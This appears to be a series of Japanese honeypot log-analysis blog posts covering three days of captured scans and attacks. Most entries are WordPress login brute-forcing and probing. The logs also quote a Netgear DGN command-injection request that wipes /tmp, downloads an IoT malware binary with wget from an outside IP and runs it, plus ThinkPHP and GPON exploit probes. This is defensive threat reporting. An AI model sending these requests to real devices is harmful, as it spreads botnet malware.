ハニーポットのログ分析(2019/03/28)
WOWhoneypotの2019/03/28(木) (運用295日目)の簡易分析です。
本日の総アクセス件数は424件です。送信元IP数は138IPです。
本日の主なアクセスは以下です。
・ WordPressの調査:165 件
・ WordPressのログイン試行攻撃:212 件
→今回は上記2つ合わせて107IPからでした。
・ GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃:2 件
→今回もAVTECHから来ていたものがありました。
・ Netgear DGNデバイスの脆弱性を突く攻撃:1 件
→久々に観測しました。ハンティングログに残っているもので、IoTマルウェアshiinaと呼ぶべきものでしょうか。
アクセスはURLのみでUAなどはありませんでした。
自分が確認した段階では既にペイロードの取得は出来ませんでしたが、以下で確認するとtelent,tmp,yakuza等が配布されていたようです。
https://urlscan.io/search/#34.80.131.135
本日のドメイン名でのアクセスは以下です。
2 GET /
1 GET /robots.txt
本日のハンティングログは以下です。Netgearを狙ったものです。IoTマルウェアshiina、といったところでしょうか。
1 2019-03-28 wget+hxxp://34.80.131[.]135/bins/shiina.arm7
以下が全アクセスログです。
| 29 | 2019/3/28 | アクセス | GET / |
| 10 | 2019/3/28 | WordPressの調査 | GET /wp-login.php |
| 9 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /wp/wp-login.php |
| 9 | 2019/3/28 | WordPressの調査 | POST /wp-login.php |
| 9 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /site/wp-login.php |
| 9 | 2019/3/28 | WordPressの調査 | GET /wp/wp-login.php |
| 9 | 2019/3/28 | WordPressの調査 | GET /site/wp-login.php |
| 8 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /wordpress/wp-login.php |
| 8 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /myforum/wp-login.php |
| 8 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /myblog/wp-login.php |
| 8 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /forum/wp-login.php |
| 8 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /blog/wp-login.php |
| 8 | 2019/3/28 | WordPressの調査 | GET /wordpress/wp-login.php |
| 8 | 2019/3/28 | WordPressの調査 | GET /myforum/wp-login.php |
| 8 | 2019/3/28 | WordPressの調査 | GET /myblog/wp-login.php |
| 8 | 2019/3/28 | WordPressの調査 | GET /forum/wp-login.php |
| 8 | 2019/3/28 | WordPressの調査 | GET /blog/wp-login.php |
| 7 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /test/wp-login.php |
| 7 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /teststite/wp-login.php |
| 7 | 2019/3/28 | WordPressの調査 | POST /testblog/wp-login.php |
| 7 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /news/wp-login.php |
| 7 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /mysite/wp-login.php |
| 7 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /2019/wp-login.php |
| 7 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /2018/wp-login.php |
| 7 | 2019/3/28 | WordPressの調査 | GET /test/wp-login.php |
| 7 | 2019/3/28 | WordPressの調査 | GET /teststite/wp-login.php |
| 7 | 2019/3/28 | WordPressの調査 | GET /testblog/wp-login.php |
| 7 | 2019/3/28 | WordPressの調査 | GET /news/wp-login.php |
| 7 | 2019/3/28 | WordPressの調査 | GET /mysite/wp-login.php |
| 7 | 2019/3/28 | WordPressの調査 | GET /2019/wp-login.php |
| 7 | 2019/3/28 | WordPressの調査 | GET /2018/wp-login.php |
| 7 | 2019/3/28 | WordPressの調査 | GET /2017/wp-login.php |
| 6 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /wp1/wp-login.php |
| 6 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /info/wp-login.php |
| 6 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /2017/wp-login.php |
| 6 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /1/wp-login.php |
| 6 | 2019/3/28 | WordPressの調査 | GET /wp1/wp-login.php |
| 6 | 2019/3/28 | WordPressの調査 | GET /info/wp-login.php |
| 6 | 2019/3/28 | WordPressの調査 | GET /1/wp-login.php |
| 5 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /xmlrpc.php |
| 5 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /wp/xmlrpc.php |
| 5 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /test/xmlrpc.php |
| 5 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /teststite/xmlrpc.php |
| 5 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /testblog/xmlrpc.php |
| 5 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /site/xmlrpc.php |
| 5 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /shop/xmlrpc.php |
| 5 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /shop/wp-login.php |
| 5 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /news/xmlrpc.php |
| 5 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /mysite/xmlrpc.php |
| 5 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /2019/xmlrpc.php |
| 5 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /2018/xmlrpc.php |
| 5 | 2019/3/28 | WordPressの調査 | GET /shop/wp-login.php |
| 4 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /wp1/xmlrpc.php |
| 4 | 2019/3/28 | WordPressのXML-RPCに対する攻撃 | POST /wordpress/xmlrpc.php |
| 4 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /myforum/xmlrpc.php |
| 4 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /myblog/xmlrpc.php |
| 4 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /info/xmlrpc.php |
| 4 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /forum/xmlrpc.php |
| 4 | 2019/3/28 | WordPressのXML-RPCに対する攻撃 | POST /blog/xmlrpc.php |
| 4 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /2017/xmlrpc.php |
| 4 | 2019/3/28 | WordPressのログイン試行攻撃 | POST /1/xmlrpc.php |
| 2 | 2019/3/28 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?style/ |
| 1 | 2019/3/28 | phpMyAdminの調査 | HEAD /phpmyadmin/index.php |
| 1 | 2019/3/28 | phpMyAdminの調査 | HEAD /phpmyadmin/%20index.php |
| 1 | 2019/3/28 | WordPressの調査 | GET ///wp-json/wp/v2/users/ |
| 1 | 2019/3/28 | Netgear DGNデバイスの脆弱性を突く攻撃 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp://34.80.131.135/bins/shiina.arm7+-O+/tmp/netgear;sh+/tmp/netgear+netgear&curpath=/¤tsetting.htm=1 |
| 1 | 2019/3/28 | クローリング | GET /robots.txt |
| 1 | 2019/3/28 | phpMyAdminの調査 | GET /phpmyadmin/index.php |
| 1 | 2019/3/28 | phpMyAdminの調査 | GET /index.php |
| 1 | 2019/3/28 | WordPressの調査 | GET ///?author=1 |
| 1 | 2019/3/28 | Kubernetesの調査 | GET /api/v1 |
| 1 | 2019/3/28 | 管理者設定の調査 | GET /admin/config.php |
以上です。
ハニーポットのログ分析(2019/03/27)
WOWhoneypotの2019/03/27(水) (運用294日目)の簡易分析です。
本日の総アクセス件数は54件です。送信元IP数は36IPです。
本日の主なアクセスは以下です。
・ GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃:1 件
・ ThinkPHPの脆弱性を突いた攻撃:2 件
本日のドメイン名でのアクセスは以下です。
5 GET /
2 GET /robots.txt
本日のハンティングログはありません。
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 32 | 2019/3/27 | アクセス | GET / |
| 7 | 2019/3/27 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 2 | 2019/3/27 | クローリング | GET /robots.txt |
| 1 | 2019/3/27 | ThinkPHPの脆弱性を突いた攻撃 | POST /index.php?s=captcha |
| 1 | 2019/3/27 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?style/ |
| 1 | 2019/3/27 | XDebugの調査 | GET /?XDEBUG_SESSION_START=phpstorm |
| 1 | 2019/3/27 | WordPressの調査 | GET /wp-admin/admin-ajax.php |
| 1 | 2019/3/27 | phpのWebShell設置の調査 | GET /test.php |
| 1 | 2019/3/27 | Apache Mod_Statusモジュール利用の調査 | GET /server-status |
| 1 | 2019/3/27 | 不明 | GET /requested.html |
| 1 | 2019/3/27 | php設定内容の確認 | GET /phpinfo.php |
| 1 | 2019/3/27 | ThinkPHPの脆弱性を突いた攻撃 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 1 | 2019/3/27 | phpMyAdminの調査 | GET /index.php |
| 1 | 2019/3/27 | phpのWebShell設置の調査 | GET /3.php |
| 1 | 2019/3/27 | phpのWebShell設置の調査 | GET /2.php |
| 1 | 2019/3/27 | phpのWebShell設置の調査 | GET /1.php |
以上です。
ハニーポットのログ分析(2019/03/26)
WOWhoneypotの2019/03/26(火) (運用293日目)の簡易分析です。
本日の総アクセス件数は5051件です。送信元IP数は504IPです。
本日の主なアクセスは以下です。
・ WordPressの調査:1825 件
・ WordPressのログイン試行攻撃:3010 件
→481IPからアクセスがありました。
先日と同様、様々なIPから様々なWordPressのログインに該当しそうなパスに対して、複数のPWDによるブルートフォースがありました。
本日のドメイン名でのアクセスは以下です。
2 GET /
1 GET /robots.txt
本日のハンティングログは以下です。
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 97 | 2019/3/26 | WordPressの調査 | GET /forum/wp-login.php |
| 97 | 2019/3/26 | WordPressの調査 | GET /2017/wp-login.php |
| 95 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /forum/wp-login.php |
| 95 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /2017/wp-login.php |
| 95 | 2019/3/26 | WordPressの調査 | GET /mysite/wp-login.php |
| 95 | 2019/3/26 | WordPressの調査 | GET /myblog/wp-login.php |
| 95 | 2019/3/26 | WordPressの調査 | GET /blog/wp-login.php |
| 94 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /2017/xmlrpc.php |
| 94 | 2019/3/26 | WordPressの調査 | GET /site/wp-login.php |
| 94 | 2019/3/26 | WordPressの調査 | GET /shop/wp-login.php |
| 94 | 2019/3/26 | WordPressの調査 | GET /2019/wp-login.php |
| 93 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /mysite/xmlrpc.php |
| 93 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /mysite/wp-login.php |
| 93 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /myblog/xmlrpc.php |
| 93 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /myblog/wp-login.php |
| 93 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /forum/xmlrpc.php |
| 93 | 2019/3/26 | WordPressのXML-RPCに対する攻撃 | POST /blog/xmlrpc.php |
| 93 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /blog/wp-login.php |
| 93 | 2019/3/26 | WordPressの調査 | GET /test/wp-login.php |
| 93 | 2019/3/26 | WordPressの調査 | GET /testblog/wp-login.php |
| 93 | 2019/3/26 | WordPressの調査 | GET /1/wp-login.php |
| 92 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /wp1/xmlrpc.php |
| 92 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /wp1/wp-login.php |
| 92 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /test/xmlrpc.php |
| 92 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /test/wp-login.php |
| 92 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /site/xmlrpc.php |
| 92 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /site/wp-login.php |
| 92 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /shop/wp-login.php |
| 92 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /2019/xmlrpc.php |
| 92 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /2019/wp-login.php |
| 92 | 2019/3/26 | WordPressの調査 | GET /wp1/wp-login.php |
| 92 | 2019/3/26 | WordPressの調査 | GET /teststite/wp-login.php |
| 92 | 2019/3/26 | WordPressの調査 | GET /info/wp-login.php |
| 91 | 2019/3/26 | WordPressのXML-RPCに対する攻撃 | POST /wordpress/xmlrpc.php |
| 91 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /wordpress/wp-login.php |
| 91 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /teststite/xmlrpc.php |
| 91 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /teststite/wp-login.php |
| 91 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /testblog/xmlrpc.php |
| 91 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /shop/xmlrpc.php |
| 91 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /1/wp-login.php |
| 91 | 2019/3/26 | WordPressの調査 | GET /wordpress/wp-login.php |
| 91 | 2019/3/26 | WordPressの調査 | GET /news/wp-login.php |
| 91 | 2019/3/26 | WordPressの調査 | GET /myforum/wp-login.php |
| 90 | 2019/3/26 | WordPressの調査 | POST /testblog/wp-login.php |
| 90 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /news/xmlrpc.php |
| 90 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /info/xmlrpc.php |
| 90 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /1/xmlrpc.php |
| 89 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /news/wp-login.php |
| 89 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /myforum/wp-login.php |
| 89 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /info/wp-login.php |
| 88 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /myforum/xmlrpc.php |
| 86 | 2019/3/26 | WordPressの調査 | GET /2018/wp-login.php |
| 85 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /2018/xmlrpc.php |
| 84 | 2019/3/26 | WordPressのログイン試行攻撃 | POST /2018/wp-login.php |
| 26 | 2019/3/26 | アクセス | GET / |
| 2 | 2019/3/26 | WordPressの調査 | GET /testblog//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /testblog//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /site//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /site//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /shop//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /shop//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /news//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /news//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /mysite//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /mysite//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /myforum//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /myforum//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /myblog//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /myblog//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /info//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /info//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /forum//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /forum//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /blog//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /blog//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /2019//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /2019//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /2018//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /2018//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /2017//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /2017//?author=1 |
| 2 | 2019/3/26 | WordPressの調査 | GET /1//wp-json/wp/v2/users/ |
| 2 | 2019/3/26 | WordPressの調査 | GET /1//?author=1 |
| 1 | 2019/3/26 | 脆弱性スキャンツールZmEuによる調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 1 | 2019/3/26 | WordPressの調査 | GET /test//wp-json/wp/v2/users/ |
| 1 | 2019/3/26 | WordPressの調査 | GET /teststite//wp-json/wp/v2/users/ |
| 1 | 2019/3/26 | WordPressの調査 | GET /teststite//?author=1 |
| 1 | 2019/3/26 | WordPressの調査 | GET /test//?author=1 |
| 1 | 2019/3/26 | クローリング | GET /robots.txt |
| 1 | 2019/3/26 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/db___.init.php |
| 1 | 2019/3/26 | phpMyAdminの調査 | GET /phpmyadmin/scripts/db___.init.php |
| 1 | 2019/3/26 | phpMyAdminの調査 | GET /phpmyadmin/index.php |
| 1 | 2019/3/26 | phpMyAdminの調査 | GET /index.php |
以上です。
